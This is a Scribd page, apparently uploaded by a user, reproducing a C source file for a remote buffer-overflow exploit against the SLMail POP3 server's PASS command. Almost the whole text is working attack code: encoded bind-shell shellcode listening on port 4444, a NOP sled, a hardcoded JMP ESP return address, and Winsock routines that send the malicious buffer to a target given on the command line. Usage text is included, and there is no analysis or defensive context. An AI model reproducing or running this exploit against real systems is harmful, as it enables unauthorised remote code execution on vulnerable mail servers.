Scribd Logo
Carica

Benvenuto in Scribd!

  • 646 Part2

    Caricato da

    frutraphih
    20 visualizzazioni2 pagine

    Titolo originale

    646-part2.txt

    Copyright

    © © All Rights Reserved

    Formati disponibili

    TXT, PDF, TXT o leggi online da Scribd

    Hai trovato utile questo documento?

    Questo contenuto è inappropriato?

    Segnala questo documento

    Copyright:

    © All Rights Reserved
    Scarica in formato TXT, PDF, TXT o leggi online su Scribd
    Segnala contenuti inappropriati
    20 visualizzazioni2 pagine

    646 Part2

    Caricato da

    frutraphih

    Copyright:

    © All Rights Reserved
    Scarica in formato TXT, PDF, TXT o leggi online su Scribd
    Segnala contenuti inappropriati
    di 2

    /*

    SLMAIL REMOTE PASSWD BOF - Ivan Ivanovic Ivanov ????-?????


    ???????????????? 31337 Team
    */

    #include <string.h>
    #include <stdio.h>
    #include <winsock2.h>
    #include <windows.h>

    // [*] bind 4444


    unsigned char shellcode[] =
    "\xdb\xd5\xbe\xbb\xb9\x4c\xe1\xd9\x74\x24\xf4\x5a\x29\xc9\xb1"
    "\x52\x83\xea\xfc\x31\x72\x13\x03\xc9\xaa\xae\x14\xd1\x25\xac"
    "\xd7\x29\xb6\xd1\x5e\xcc\x87\xd1\x05\x85\xb8\xe1\x4e\xcb\x34"
    "\x89\x03\xff\xcf\xff\x8b\xf0\x78\xb5\xed\x3f\x78\xe6\xce\x5e"
    "\xfa\xf5\x02\x80\xc3\x35\x57\xc1\x04\x2b\x9a\x93\xdd\x27\x09"
    "\x03\x69\x7d\x92\xa8\x21\x93\x92\x4d\xf1\x92\xb3\xc0\x89\xcc"
    "\x13\xe3\x5e\x65\x1a\xfb\x83\x40\xd4\x70\x77\x3e\xe7\x50\x49"
    "\xbf\x44\x9d\x65\x32\x94\xda\x42\xad\xe3\x12\xb1\x50\xf4\xe1"
    "\xcb\x8e\x71\xf1\x6c\x44\x21\xdd\x8d\x89\xb4\x96\x82\x66\xb2"
    "\xf0\x86\x79\x17\x8b\xb3\xf2\x96\x5b\x32\x40\xbd\x7f\x1e\x12"
    "\xdc\x26\xfa\xf5\xe1\x38\xa5\xaa\x47\x33\x48\xbe\xf5\x1e\x05"
    "\x73\x34\xa0\xd5\x1b\x4f\xd3\xe7\x84\xfb\x7b\x44\x4c\x22\x7c"
    "\xab\x67\x92\x12\x52\x88\xe3\x3b\x91\xdc\xb3\x53\x30\x5d\x58"
    "\xa3\xbd\x88\xcf\xf3\x11\x63\xb0\xa3\xd1\xd3\x58\xa9\xdd\x0c"
    "\x78\xd2\x37\x25\x13\x29\xd0\x8a\x4c\x11\x02\x63\x8f\x51\x53"
    "\x2f\x06\xb7\x39\xdf\x4e\x60\xd6\x46\xcb\xfa\x47\x86\xc1\x87"
    "\x48\x0c\xe6\x78\x06\xe5\x83\x6a\xff\x05\xde\xd0\x56\x19\xf4"
    "\x7c\x34\x88\x93\x7c\x33\xb1\x0b\x2b\x14\x07\x42\xb9\x88\x3e"
    "\xfc\xdf\x50\xa6\xc7\x5b\x8f\x1b\xc9\x62\x42\x27\xed\x74\x9a"
    "\xa8\xa9\x20\x72\xff\x67\x9e\x34\xa9\xc9\x48\xef\x06\x80\x1c"
    "\x76\x65\x13\x5a\x77\xa0\xe5\x82\xc6\x1d\xb0\xbd\xe7\xc9\x34"
    "\xc6\x15\x6a\xba\x1d\x9e\x9a\xf1\x3f\xb7\x32\x5c\xaa\x85\x5e"
    "\x5f\x01\xc9\x66\xdc\xa3\xb2\x9c\xfc\xc6\xb7\xd9\xba\x3b\xca"
    "\x72\x2f\x3b\x79\x72\x7a";
    void exploit(int sock) {
    FILE *test;
    int *ptr;
    char userbuf[] = "USER madivan\r\n";
    char evil[3001];
    char buf[3012];
    char receive[1024];
    char nopsled[] = "\x90\x90\x90\x90\x90\x90\x90\x90";
    memset(buf, 0x00, 3012);
    memset(evil, 0x00, 3001);
    memset(evil, 0x41, 3000);
    ptr = &evil;
    ptr = ptr + 652; // 2608
    memcpy(ptr, &nopsled, 8);
    ptr = ptr + 4;
    memcpy(ptr, &shellcode, 351);
    // *(long*)&evil[2606] = 0x8f354a5f; // JMP ESP XP 7CB41020 FFE4 JMP ESP
    *(long*)&evil[2606] = 0x5f4a358f;

    // banner
    recv(sock, receive, 200, 0);
    printf("[+] %s", receive);
    // user
    printf("[+] Sending Username...\n");
    send(sock, userbuf, strlen(userbuf), 0);
    recv(sock, receive, 200, 0);
    printf("[+] %s", receive);
    // passwd
    printf("[+] Sending Evil buffer...\n");
    sprintf(buf, "PASS %s\r\n", evil);
    //test = fopen("test.txt", "w");
    //fprintf(test, "%s", buf);
    //fclose(test);
    send(sock, buf, strlen(buf), 0);
    }

    int connect_target(char *host, u_short port)


    {
    int sock = 0;
    struct hostent *hp;
    WSADATA wsa;
    struct sockaddr_in sa;

    WSAStartup(MAKEWORD(2,0), &wsa);
    memset(&sa, 0, sizeof(sa));

    hp = gethostbyname(host);
    if (hp == NULL) {
    printf("gethostbyname() error!\n"); exit(0);
    }
    printf("[+] Connecting to %s\n", host);
    sa.sin_family = AF_INET;
    sa.sin_port = htons(port);
    sa.sin_addr = **((struct in_addr **) hp->h_addr_list);

    sock = socket(AF_INET, SOCK_STREAM, 0);


    if (sock < 0) {
    printf("[-] socket blah?\n");
    exit(0);
    }
    if (connect(sock, (struct sockaddr *) &sa, sizeof(sa)) < 0)
    {printf("[-] connect() blah!\n");
    exit(0);
    }
    printf("[+] Connected to %s\n", host);
    return sock;
    }

    int main(int argc, char **argv)


    {
    int sock = 0;
    int data, port;
    printf("\n[$] SLMail Server POP3 PASSWD Buffer Overflow exploit\n");
    printf("[$] by Mad Ivan [ void31337 team ] - http://exploit.void31337.ru\n\n");
    if ( argc < 2 ) { printf("usage: slmail-ex.exe <host> \n\n"); exit(0); }
    port = 110;
    sock = connect_target(argv[1], port);
    exploit(sock);
    closesocket(sock);
    return 0;
    }

    Potrebbero piacerti anche